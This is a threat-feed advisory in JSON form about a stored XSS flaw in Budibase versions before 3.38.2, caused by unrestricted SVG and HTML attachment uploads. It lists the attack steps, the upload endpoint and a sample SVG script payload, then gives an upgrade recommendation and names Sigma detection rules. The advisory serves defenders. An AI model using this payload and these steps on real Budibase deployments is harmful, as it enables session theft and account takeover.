{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/budibase--3.38.2/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["budibase (\u003c 3.38.2)"],"_cs_severities":["high"],"_cs_tags":["xss","file-upload","budibase","cve-2026-46426"],"_cs_type":"advisory","_cs_vendors":["Budibase"],"content_html":"\u003cp\u003eBudibase, a low-code platform, is susceptible to a stored cross-site scripting (XSS) vulnerability (CVE-2026-46426) affecting versions prior to 3.38.2. The vulnerability stems from the \u003ccode\u003e/api/attachments/process\u003c/code\u003e endpoint, which inadequately restricts the upload of files with dangerous content. Authenticated users with builder privileges can upload malicious files, such as SVG files containing inline JavaScript, HTML pages with embedded scripts, or JavaScript modules. These files are stored with correct MIME types in the object store (MinIO/S3). Subsequently, when any application user accesses a screen containing the URL of the uploaded file, the browser executes the malicious payload, potentially leading to session cookie theft and full account takeover. This issue impacts both application end-users and builder accounts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker authenticates to Budibase as a user with the Builder role via \u003ccode\u003ePOST /api/global/auth/default/login\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe server responds with a JWT and CSRF token embedded within the session.\u003c/li\u003e\n\u003cli\u003eThe attacker extracts the CSRF token from the session.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious SVG file containing an XSS payload, such as \u003ccode\u003e\u0026lt;svg xmlns=\u0026quot;http://www.w3.org/2000/svg\u0026quot;\u0026gt;\u0026lt;script\u0026gt;alert(document.domain)\u0026lt;/script\u0026gt;\u0026lt;/svg\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the malicious SVG file to the \u003ccode\u003e/api/attachments/process\u003c/code\u003e endpoint using a \u003ccode\u003ePOST\u003c/code\u003e request with the \u003ccode\u003eContent-Type\u003c/code\u003e set to \u003ccode\u003emultipart/form-data\u003c/code\u003e and including the CSRF token.\u003c/li\u003e\n\u003cli\u003eThe server stores the SVG file in the object store (MinIO/S3) with the correct MIME type (\u003ccode\u003eimage/svg+xml\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe server returns a JSON response containing the URL of the uploaded file, such as \u003ccode\u003ehttp://target:10000/files/signed/.../\u0026lt;uuid\u0026gt;.svg?X-Amz-...\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eAn end user accesses a screen within the Budibase application that includes the URL of the uploaded SVG file, causing the browser to execute the embedded JavaScript. This results in XSS.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability allows for persistent stored XSS on any screen displaying the attachment URL. Successful exploitation can lead to session cookie theft, resulting in full account takeover for application end-users. Furthermore, if a malicious URL is shared within the workspace, such as in a table attachment or embedded image, the XSS can fire in a builder\u0026rsquo;s session, potentially leading to workspace takeover. The number of affected users depends on the scale of the Budibase application and the visibility of the malicious attachment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Budibase to version 3.38.2 or later to patch CVE-2026-46426.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Budibase Suspicious SVG Upload\u0026rdquo; to monitor for the upload of SVG files containing \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tags.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Budibase Attachment Request with SVG Extension\u0026rdquo; to monitor for requests to uploaded SVG attachments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-19T16:33:54Z","date_published":"2026-05-19T16:33:54Z","id":"https://feed.craftedsignal.io/briefs/2026-05-budibase-xss/","summary":"Budibase is vulnerable to persistent stored XSS (CVE-2026-46426) due to unrestricted file upload of active content by authenticated users, leading to potential session cookie theft and account takeover.","title":"Budibase Stored XSS Vulnerability via Unrestricted File Upload (CVE-2026-46426)","url":"https://feed.craftedsignal.io/briefs/2026-05-budibase-xss/"}],"language":"en","title":"CraftedSignal Threat Feed — Budibase (\u003c 3.38.2)","version":"https://jsonfeed.org/version/1.1"}